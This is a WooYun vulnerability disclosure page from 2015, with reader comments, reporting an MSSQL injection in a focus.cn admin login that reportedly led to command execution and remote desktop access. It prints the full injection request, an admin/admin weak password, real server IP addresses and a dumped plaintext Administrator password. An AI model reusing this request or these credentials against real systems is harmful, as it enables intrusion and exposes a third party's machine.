当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0118068

漏洞标题:焦点房产某域名MSSQL注入(已登入远程桌面)

相关厂商:焦点房产

漏洞作者: lijiejie

提交时间:2015-06-04 08:37

修复时间:2015-07-19 08:52

公开时间:2015-07-19 08:52

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-04: 细节已通知厂商并且等待厂商处理中
2015-06-04: 厂商已经确认,细节仅向厂商公开
2015-06-14: 细节向核心白帽子及相关领域专家公开
2015-06-24: 细节向普通白帽子公开
2015-07-04: 细节向实习白帽子公开
2015-07-19: 细节向公众公开

简要描述:

焦点房产某域名MSSQL注入,sa,轻松创建帐号远程登入Windows系统。

详细说明:

meijugou.focus.cn后台登录页面的MSSQL注入,sa,可以执行系统命令:

POST /web_admin/login.aspx HTTP/1.1
Host: meijugou.focus.cn
Proxy-Connection: keep-alive
Content-Length: 239
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://meijugou.focus.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://meijugou.focus.cn/web_admin/login.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: PHPSESSID=5ff020a410401150521fe179ae47c438; sohutag=8HsmeSc5NCwmcyc5NCwmYjc5NCwmYSc5NCwmZjc5NSwmZyc5NCwmbjc5NCwmaSc5NCwmdyc5NCwmaCc5NCwmYyc5NCwmZSc5NCwmbSc5NH0; IPLOC=CN1100; SUV=1506032025433118; __utma=1.790066425.1433334400.1433334400.1433334400.1; __utmb=1.1.10.1433334400; __utmc=1; __utmz=1.1433334400.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASP.NET_SessionId=b4y3aydjc5hoscxs0ofbechu
__VIEWSTATE=%2FwEPDwULLTE3MDQ5NjIzMjhkZP1IBl1CCSDOuKtdTEUX%2B61JBUPK%2Bk4NgOP8xFBrmp8p&__EVENTVALIDATION=%2FwEWBAKzh8%2FiCAL3xJvhBALS9cL8AgKRvKPSBajfdDeFZc8S1AnpXdqmVZhyuWpMh%2FB9iDz6o%2Bb%2FYkjg&txt_UserName=test*&txt_Password=1&but_login=


漏洞证明:

此处后台是弱口令 admin / admin
推测是DNS运维失误,还没有删除这个域名,实际解析到别的公司服务器上了。

focus.cn.png


该机器双IP,但没有内网IP。

IPv4 地址 . . . . . . . . . . . . : 112.65.249.157
子网掩码 . . . . . . . . . . . . : 255.255.255.128
IPv4 地址 . . . . . . . . . . . . : 114.80.94.246
子网掩码 . . . . . . . . . . . . : 255.255.255.128
默认网关. . . . . . . . . . . . . : 114.80.94.254


抓administrator的密码,发现跟focus好像没什么关系:

* User: Administrator
* Domain: WIN-CT6249O7FLF
* Password: 246@7x24.cn

修复方案:

如果是DNS运维失误,则删出DNS记录。
如果是自家的机器,解决SQL注射和弱口令的问题。

版权声明:转载请注明来源 lijiejie@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-06-04 08:51

厂商回复:

感谢你对搜狐安全的支持。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-06-04 09:14 | luwikes ( 普通白帽子 | Rank:512 漏洞数:77 | 潜心学习~~~)

    都到远程桌面了还是5分。。

  2. 2015-06-04 11:17 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @luwikes 必须呵呵了。

  3. 2015-06-04 11:26 | tSt ( 路人 | Rank:27 漏洞数:7 | 在开发里运维最强,运维里网络最强,网络里...)

    都到远程桌面了还是5分。。

  4. 2015-06-04 11:28 | 牛 小 帅 ( 普通白帽子 | Rank:363 漏洞数:84 | [code]心若没有栖息的地方,走到哪里都是在...)

    @luwikes 我觉得应该8分

  5. 2015-06-04 11:38 | lijiejie 认证白帽子 ( 核心白帽子 | Rank:2210 漏洞数:294 | Just for fun.)

    @luwikes 还好的,这个不一定是他们机器。 详情中其实有说明,有可能是DNS记录没删,指向了其他公司的机器。

  6. 2015-06-04 11:45 | 牛 小 帅 ( 普通白帽子 | Rank:363 漏洞数:84 | [code]心若没有栖息的地方,走到哪里都是在...)

    @lijiejie 李姐姐 求抱(爆)大腿